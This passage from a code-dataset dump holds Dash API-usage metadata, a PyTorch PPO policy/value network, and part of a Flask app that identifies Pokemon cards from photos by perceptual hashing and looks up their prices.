"usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 111, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 114, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 114, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 115, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 115, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 116, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 116, "usage_type": "name"}, {"api_name": "dash.dash_table.DataTable", "line_number": 121, "usage_type": "call"}, {"api_name": "dash.dash_table", "line_number": 121, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 172, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 172, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 178, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 178, "usage_type": "name"}, {"api_name": "dash.dcc.Checklist", "line_number": 179, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 179, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 205, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 205, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 209, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 209, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 213, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 213, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 217, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 217, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 221, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 221, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 225, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 225, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 229, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 229, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 233, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 233, "usage_type": "name"}, {"api_name": "dash.dash_table.DataTable", "line_number": 237, "usage_type": "call"}, {"api_name": "dash.dash_table", "line_number": 237, "usage_type": "name"}, {"api_name": "plotly.express.bar", "line_number": 288, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 288, "usage_type": "name"}, {"api_name": "plotly.express.imshow", "line_number": 296, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 296, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 304, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 304, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 305, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 305, "usage_type": "name"}, {"api_name": "dash.html.Br", "line_number": 306, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 306, "usage_type": "name"}, {"api_name": "dash.html.Br", "line_number": 307, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 307, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 308, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 309, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 310, "usage_type": 
"call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 311, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 315, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 315, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 317, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 317, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 318, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 318, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 319, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 319, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 320, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 320, "usage_type": "name"}, {"api_name": "dash.html.H6", "line_number": 321, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 321, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 322, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 322, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 323, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 323, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 326, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 326, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 327, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 328, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 328, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 329, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 329, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 330, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 330, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 331, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 331, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 335, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 335, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 337, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 337, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 338, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 338, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 339, "usage_type": "call"}, {"api_name": "dash.html.H6", "line_number": 340, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 340, "usage_type": "name"}, {"api_name": "dash.html.H6", "line_number": 341, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 341, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 342, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 344, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 344, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 345, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 346, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 347, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 351, "usage_type": "call"}, 
{"api_name": "dash.html", "line_number": 351, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 353, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 353, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 354, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 354, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 355, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 355, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 355, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 356, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 356, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 357, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 357, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 361, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 361, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 362, "usage_type": "call"}, {"api_name": "dash.html.H6", "line_number": 363, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 363, "usage_type": "name"}, {"api_name": "dash.html.H6", "line_number": 364, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 364, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 365, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 366, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 366, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 370, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 370, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 372, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 372, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 373, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 373, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 374, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 375, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 376, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 377, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 378, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 379, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 379, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 380, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 380, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 383, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 384, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 385, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 385, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 386, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 386, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 389, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", 
"line_number": 390, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 391, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 391, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 392, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 392, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 395, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 396, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 397, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 397, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 398, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 398, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 402, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 403, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 404, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 405, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 405, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 406, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 406, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 409, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 410, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 411, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 411, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 412, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 412, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 415, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 416, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 417, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 417, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 418, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 418, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 421, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 422, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 423, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 423, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 424, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 424, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 432, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 432, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 434, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 434, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 
435, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 435, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 436, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 436, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 436, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 437, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 437, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 438, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 438, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 443, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 443, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 444, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 445, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 446, "usage_type": "call"}, {"api_name": "dash.dcc.Graph", "line_number": 446, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 446, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 447, "usage_type": "call"}, {"api_name": "dash.dcc.Graph", "line_number": 447, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 447, "usage_type": "name"}, {"api_name": "plotly.express.line", "line_number": 468, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 468, "usage_type": "name"}, {"api_name": "dash.Output", "line_number": 462, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 463, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 492, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 492, "usage_type": "name"}, {"api_name": "dash.Output", "line_number": 486, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 487, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 511, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 512, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 528, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 528, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 529, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 529, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 533, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 533, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 537, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 537, "usage_type": "name"}, {"api_name": "dash.Output", "line_number": 521, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 522, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 558, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 559, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 570, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 571, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 581, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 582, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 592, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 593, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 610, "usage_type": 
"call"}, {"api_name": "datetime.timedelta", "line_number": 611, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 614, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 614, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 615, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 603, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 604, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 623, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 624, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 634, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 635, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 645, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 646, "usage_type": "call"}]} +{"seq_id": "74429776166", "text": "\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom torch.nn import functional as F\n\n\nclass Model(nn.Module):\n \"\"\"\n ## Model\n \"\"\"\n\n def __init__(self, state_size, action_size):\n super().__init__()\n\n self.fc1 = nn.Linear(in_features=state_size, out_features=256)\n nn.init.orthogonal_(self.fc1.weight, np.sqrt(0.01))\n self.fc2 = nn.Linear(in_features=256, out_features=256)\n nn.init.orthogonal_(self.fc2.weight, np.sqrt(0.01))\n self.fc3 = nn.Linear(in_features=256, out_features=256)\n nn.init.orthogonal_(self.fc3.weight, np.sqrt(0.01))\n\n # policy output\n self.pi_logits = nn.Linear(in_features=256, out_features=action_size)\n nn.init.orthogonal_(self.pi_logits.weight, np.sqrt(0.01))\n\n # value function output\n self.value = nn.Linear(in_features=256, out_features=1)\n nn.init.orthogonal_(self.value.weight, 1)\n\n def forward(self, obs):\n h: torch.Tensor\n\n h = F.relu(self.fc1(obs))\n h = F.relu(self.fc2(h))\n h = F.relu(self.fc3(h))\n\n value = self.value(h).reshape(-1)\n\n return self.pi_logits(h), value\n", "repo_name": "AndreHeunis5/game_optimise", "sub_path": "ppo/Model.py", "file_name": "Model.py", "file_ext": "py", "file_size_in_byte": 1156, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 22, 
"usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.relu", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "71811613929", "text": "from flask import Flask, render_template, current_app, request, redirect, url_for, jsonify\nimport urllib\nfrom urllib.request import Request, urlopen\nimport json\nimport imagehash\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport os\nimport requests\n\ndef flattener(image, pts, w, h):\n \"\"\"Flattens an image of a card into a top-down 200x300 perspective.\n Returns the flattened, re-sized, grayed image.\"\"\"\n temp_rect = np.zeros((4, 2), dtype=\"float32\")\n\n s = np.sum(pts, axis=2)\n\n tl = pts[np.argmin(s)]\n br = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=-1)\n tr = pts[np.argmin(diff)]\n bl = pts[np.argmax(diff)]\n\n # Need to create an array listing points in order of\n # [top left, top right, bottom right, bottom left]\n # before doing the perspective transform\n\n if w <= 0.8 * h: # If card is vertically oriented\n temp_rect[0] = tl\n temp_rect[1] = tr\n temp_rect[2] = br\n temp_rect[3] = bl\n\n if w >= 1.2 * h: # If card is horizontally oriented\n temp_rect[0] = bl\n temp_rect[1] = tl\n temp_rect[2] = tr\n temp_rect[3] = br\n\n # If the card is 'diamond' oriented, a different algorithm\n # has to be used to identify which point is top left, top right\n # bottom left, and bottom right.\n\n if w > 0.8 * h and w < 1.2 * h: # If card is diamond oriented\n # If furthest left point is higher than furthest right point,\n # card is tilted to the left.\n if pts[1][0][1] <= pts[3][0][1]:\n # If card is titled to the left, approxPolyDP returns points\n # in this order: top right, top left, bottom left, bottom right\n temp_rect[0] = pts[1][0] # Top left\n temp_rect[1] = pts[0][0] # Top right\n temp_rect[2] = pts[3][0] # Bottom right\n temp_rect[3] = pts[2][0] # Bottom left\n\n # If furthest left point is lower than furthest right point,\n # card is tilted to the right\n if pts[1][0][1] > pts[3][0][1]:\n # If card is titled to the right, approxPolyDP returns points\n # in this order: top left, bottom left, bottom right, top right\n 
temp_rect[0] = pts[0][0] # Top left\n temp_rect[1] = pts[3][0] # Top right\n temp_rect[2] = pts[2][0] # Bottom right\n temp_rect[3] = pts[1][0] # Bottom left\n\n maxWidth = 200\n maxHeight = 300\n\n # Create destination array, calculate perspective transform matrix,\n # and warp card image\n dst = np.array([[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]], np.float32)\n M = cv2.getPerspectiveTransform(temp_rect, dst)\n warp = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n #this just transforms and flattens the card\n \n #warp = cv2.cvtColor(warp, cv2.COLOR_BGR2GRAY)\n return warp\n\n\ndef getcardPhoto(photo):\n\n img = cv2.imread(photo) #reads photo\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #grayscales the image \n img_w, img_h = np.shape(img)[:2] #gets height and width for image\n bkg_level = gray[int(img_h / 100)][int(img_w / 2)] #does some preprocessing to the image to deal with the background\n thresh_level = bkg_level + 60 #we get the threshold level for the image, threshold sets pixels below pixel value to 0. So this level makes sure we set the background to black, so its not picked up\n blurImg = cv2.GaussianBlur(gray, (5,5), 0) #applies some gaussian blur to the image to help fade out the background\n _, thresh = cv2.threshold(blurImg, thresh_level, 255, cv2.THRESH_BINARY) #returns a tupple, first return is threshold value which is not important and second is the thresholded image, the 255 is max values that the pixels can have after threshold\n #above is where the potential errors lie for this program, image preprocessing is hit or miss and needs a lot of trial and error \n \n contours, _ = cv2.findContours(thresh, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) #gets the contours of the image\n\n contourValues = []\n for i in contours:\n contourValues.append(cv2.contourArea(i))\n contourValues.sort()\n #adds all contours in the image to an array of contours\n\n biggestContour = 0\n bigContourIndex = len(contourValues)-1\n\n for b in contours:\n if cv2.contourArea(b) == contourValues[-1]:\n biggestContour = b\n #This makes sure that the last contour of the array(the biggest one) is actually the contour around the card\n\n #once we have contours\n if len(contourValues) != 0:\n peri = cv2.arcLength(biggestContour, True) #defines a permiter around the card\n approx = cv2.approxPolyDP(biggestContour, 0.01 * peri, True) #helps identify the rectangle that is the card\n pts = np.float32(approx) #gets the 4 points for the rectangle\n CardCornerPoints = pts\n x, y, w, h = cv2.boundingRect(biggestContour) #highights the card and returns the x,y away from origin and width/height values for the card.\n CardWidth, CardHeight = w, h #assigning width and height\n average = np.sum(pts, axis=0)/len(pts) #finds center of the card based on the average of 4 corner points\n cent_x = int(average[0][0]) #assigns x value for center\n cent_y = int(average[0][1]) #assigns y value for center\n CardCenter = [cent_x, cent_y] #makes an array with the center\n img = flattener(img, pts, w, h) #sends image to be preprocessed farther and then flattened to 200x300 pixel image\n cv2.imwrite('camImage.png', img) #saves the newly processed image\n hashForCamImg = imagehash.phash(Image.open('camImage.png')) #gets the perceptual hash for the saved image\n return hashForCamImg\n #print(hashForCamImg)\n #hashForOnlineImg = imagehash.phash(Image.open('78.png'))\n #print(hashForOnlineImg)\n #print((hashForCamImg - hashForOnlineImg))\n\n\n #img = warpedIMG[0: 30, 0:int(w/2)]\n 
#print(pytesseract.image_to_string(img))\n #cv2.rectangle(img, (x, y), (x + w, y + h), (34, 65, 255), 3)\n #img = img[y:y+h, x:x+w]\n #cv2.imshow('image', img)\n\n\n else:\n return 'busted' #otherwise we dont detect any contours and we just return\n cv2.drawContours(img, contours, -1, (0,255,0), 3)\n\n #cv2.imshow('image', img)\n\n\n key = cv2.waitKey(0) #for testing locally\n cv2.destroyAllWindows() #for local testing \n\n\napp = Flask(__name__, static_url_path='') #declaring the flask application\n\n@app.after_request\ndef add_header(r):\n \"\"\"\n program brakes if it caches because it will cache the previous post results and it wont update,\n this removes caching so that the program will run properly\n \"\"\"\n r.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n r.headers[\"Pragma\"] = \"no-cache\"\n r.headers[\"Expires\"] = \"0\"\n r.headers['Cache-Control'] = 'public, max-age=0'\n return r\n\n@app.route(\"/index.html\") #renders home page when logo clicked\ndef topLeft():\n return render_template(\"index.html\")\n\n@app.route(\"/\") #renders home page\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/pokemon.html\") #renders pokemon page\ndef poke():\n return render_template(\"pokemon.html\")\n\n\n@app.route(\"/pokemon.html\", methods=['POST']) #user sends pokemon card image\ndef getIMG():\n userinputImage = request.files['user_group_logo'] #gets the image that the user inputted\n readyTorender = False\n buyCardURL =''\n if userinputImage.filename == '': #this is executed if no image is sent, should render a template that says no image was detected as input\n return render_template(\"pokemon.html\", message='no file was uploaded') #kind of like sending a prop in react \n if userinputImage.filename != '': #user inputted an actual image\n userinputImage.save('static/assets/img/inputImageName.png') #overwrites a default saved image\n print('<----got image---->') \n print(userinputImage.filename) #this was just for testing, to make sure it was saving properly\n photo = 'static/assets/img/inputImageName.png' #full path\n photoPath = 'assets/img/inputImageName.png'\n camHash = getcardPhoto(photo) # this is what to use when passing in a photo, this passes to a function that returns the perceptual hash for the pokemon card\n\n if type(camHash) == str: #this if statement is executed if the pokemon card is not picked up at all, and then no hash is sent back.\n print('try again')\n return render_template(\"pokemon.html\", message='unable to identify the pokemon card please try again') #this should render a template that says take a better picture\n\n #opens up json file with all hashes and pokemon info and instantiates some variables to use later\n with open('backupForpokeJSONUpToBW10.json') as f:\n newFileData = json.load(f)\n first = newFileData[0]\n likelyPoke = ''\n likelyId = ''\n listOfSmallestDifsNames = []\n listOfSmallestDifsImages = []\n smallestDiff = abs(camHash - imagehash.hex_to_hash(first['hash'])) #sets the initial smallest hash to the first pokemon\n for i in newFileData: #loops through entire file, checks for the smallest differences between hashes, and then adds them to the array. 
also gets pokemon name, id, and images\n if abs(camHash - imagehash.hex_to_hash(i['hash'])) < smallestDiff: #new info about closest match is added to the end of the array\n likelyPoke = i['name']\n likelyId = i['id']\n imageForlikelyPoke = i['images']\n imageForlikelyPoke = imageForlikelyPoke['small']\n smallestDiff = abs(camHash - imagehash.hex_to_hash(i['hash'])) #gets the value of the closest match by substracting the input image hash-the image hash of the current pokemon in the file\n listOfSmallestDifsNames.append(likelyPoke)\n listOfSmallestDifsImages.append(imageForlikelyPoke)\n\n print(f'name: {likelyPoke}, image: {imageForlikelyPoke}, id: {likelyId}') #prings the pokemon that were most similar to the input image\n try: #gets pokemon price data\n headers = {'X-Api-Key': 'apiKeyGoesHere'}\n urlWithId = 'https://api.pokemontcg.io/v2/cards/' + likelyId\n pokePriceresponse = requests.get(urlWithId, headers=headers)\n pokemonPriceData = pokePriceresponse.json()['data']['tcgplayer']\n buyCardURL = pokemonPriceData['url']\n ActualPrices = pokemonPriceData['prices']['normal']['market']\n ActualPrices= f'market price is : {ActualPrices}$'\n \n except:\n try:\n #incase of holofoil\n ActualPrices= pokemonPriceData['prices']['holofoil']['market']\n ActualPrices = f'holofoil price: {ActualPrices}$'\n\n except:\n try:\n #no price found\n ActualPrices = 'unfortunately we could not detect a price'\n\n except:\n #no data at all found\n ActualPrices = 'no data found on the card'\n\n\n\n probabilityCount = 1 